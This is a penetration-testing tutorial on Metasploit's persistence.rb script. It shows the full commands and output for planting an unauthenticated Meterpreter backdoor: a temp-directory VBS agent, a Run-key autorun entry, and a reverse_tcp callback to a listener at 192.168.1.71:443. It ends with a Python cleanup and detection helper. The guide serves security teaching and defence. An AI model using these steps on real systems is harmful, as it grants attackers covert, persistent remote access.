
METERPRETER SERVICE

UNDERSTANDING METASPLOIT METERPRETER

After going through all the hard work of exploiting a system, it is often a good idea to leave yourself an easier way back into it for later use. That way, if the service you originally exploited is taken down or patched, you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, that creates a Meterpreter service which remains available to you even after the remote system is rebooted.

A word of warning before going any further. The persistent Meterpreter shown here requires no authentication. This means that anyone who gains access to the port can reach your backdoor! That is not a good thing if you are conducting a penetration test, because it can be a significant risk. In a real-world situation, be sure to exercise extreme caution and clean up after yourself when the engagement is over.

Having exploited the host initially, we run persistence with the -h switch to see which options are available:

meterpreter > run persistence -h

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L   Location in target host to write payload to, if none %TEMP% will be used.
    -P   Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T   Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i   The interval in seconds between each connection attempt
    -p   The port on which the system running Metasploit is listening
    -r   The IP of the system running Metasploit listening for the connect back

We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and then try to connect back to our listener at IP address 192.168.1.71 on port 443 every 5 seconds.

meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.71
[*] Creating a persistent agent: LHOST=192.168.1.71 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613976 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs
[*] Agent executed with PID 492
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc
meterpreter >

Notice that the script output gives you the command to remove the persistent listener when you are done with it. Be sure to make a note of it so that you do not leave an unauthenticated backdoor on the system. To verify that it works, we reboot the remote system and set up our payload handler.

meterpreter > reboot
Rebooting...
meterpreter > exit

[*] Meterpreter session 3 closed.  Reason: User exit
msf exploit(ms08_067_netapi) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.71
LHOST => 192.168.1.71
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.71:443
[*] Starting the payload handler...

When a user logs on to the remote system, a Meterpreter session is opened for us.

[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 5 opened (192.168.1.71:443 -> 192.168.1.161:1045) at 2010-08-21 12:31:42 -0600

meterpreter > sysinfo
Computer: XEN-XP-SP2-BARE
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter >
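The script output above is the only record of what was left on the host: the uploaded agent, the autorun value and the cleanup resource file. As an added example (not part of this page or of Metasploit), the following Python parses those status lines into a cleanup checklist, and applies the same observation from the defender's side by flagging Run-key values that launch a script out of a temp directory, which is exactly the footprint persistence.rb produces with the defaults used here. The sample output is copied from the session on this page; the Run-key entries are constructed, and the command value for the YeYHdlEDygViABr entry is assumed, since the page does not show it.

```python
import re
from typing import Dict, List, Mapping

# Constructed sample: the persistence script's own status lines, copied from the
# session shown on this page.
PERSISTENCE_OUTPUT = """\
[*] Creating a persistent agent: LHOST=192.168.1.71 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613976 bytes long
[*] Uploaded the persistent agent to C:\\WINDOWS\\TEMP\\yyPSPPEn.vbs
[*] Agent executed with PID 492
[*] Installing into autorun as HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\YeYHdlEDygViABr
[*] Installed into autorun as HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\YeYHdlEDygViABr
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc
"""

# One regex per artifact we care about; each captures the value to record.
PATTERNS = {
    "agent_path": re.compile(r"^\[\*\] Uploaded the persistent agent to (.+)$"),
    "autorun_key": re.compile(r"^\[\*\] Installed into autorun as (.+)$"),
    "pid": re.compile(r"^\[\*\] Agent executed with PID (\d+)$"),
    "cleanup_rc": re.compile(r"^\[\*\] For cleanup use command: run multi_console_command -rc (\S+)$"),
    "listener": re.compile(r"LHOST=(\S+) LPORT=(\d+)"),
}


def parse_persistence_output(text: str) -> Dict[str, str]:
    """Pull the artifacts the script left behind out of its status lines."""
    found: Dict[str, str] = {}
    for line in text.splitlines():
        for key, pat in PATTERNS.items():
            m = pat.search(line)
            if not m:
                continue
            if key == "listener":
                found["lhost"], found["lport"] = m.group(1), m.group(2)
            else:
                found[key] = m.group(1)
    return found


def cleanup_checklist(artifacts: Mapping[str, str]) -> List[str]:
    """Turn the parsed artifacts into the list of things to remove or verify."""
    steps = []
    if "cleanup_rc" in artifacts:
        steps.append(f"run multi_console_command -rc {artifacts['cleanup_rc']}")
    if "autorun_key" in artifacts:
        steps.append(f"verify registry value removed: {artifacts['autorun_key']}")
    if "agent_path" in artifacts:
        steps.append(f"verify file removed: {artifacts['agent_path']}")
    if "pid" in artifacts:
        steps.append(f"verify process {artifacts['pid']} no longer running")
    return steps


# Defender side: persistence.rb writes a .vbs into %TEMP% (see the -L option)
# and points an HKCU Run value at it. Script launched from a temp directory is
# the signal; the random value name alone is not reliable.
TEMP_DIRS = ("\\windows\\temp\\", "\\temp\\", "\\tmp\\", "%temp%")
SCRIPT_EXTS = (".vbs", ".js", ".wsf", ".bat", ".cmd", ".ps1")


def is_suspicious_autorun(command: str) -> bool:
    """Flag a Run-key command that launches a script from a temp directory."""
    c = command.lower().replace('"', "")
    in_temp = any(d in c for d in TEMP_DIRS)
    is_script = any(ext in c for ext in SCRIPT_EXTS)
    return in_temp and is_script


# Constructed Run-key snapshot; the first value's command is assumed.
SAMPLE_RUN_KEY = {
    "YeYHdlEDygViABr": r'wscript.exe "C:\WINDOWS\TEMP\yyPSPPEn.vbs"',
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "ctfmon": r"C:\WINDOWS\system32\ctfmon.exe",
}


def triage_run_key(entries: Mapping[str, str]) -> List[str]:
    """Return the names of Run-key values that match the temp-script pattern."""
    return sorted(name for name, cmd in entries.items() if is_suspicious_autorun(cmd))


if __name__ == "__main__":
    arts = parse_persistence_output(PERSISTENCE_OUTPUT)
    for step in cleanup_checklist(arts):
        print("[cleanup]", step)
    for name in triage_run_key(SAMPLE_RUN_KEY):
        print("[suspicious autorun]", name, "->", SAMPLE_RUN_KEY[name])
```

The parser keys on the literal phrases persistence.rb prints, so it only covers that script; the deprecated-script notice at the top of the output suggests the post/windows/manage/persistence_exe module, whose output lines differ. The autorun heuristic is deliberately narrow (script file under a temp path), which keeps false positives low on the ordinary entries in the sample while still catching the default placement used on this page.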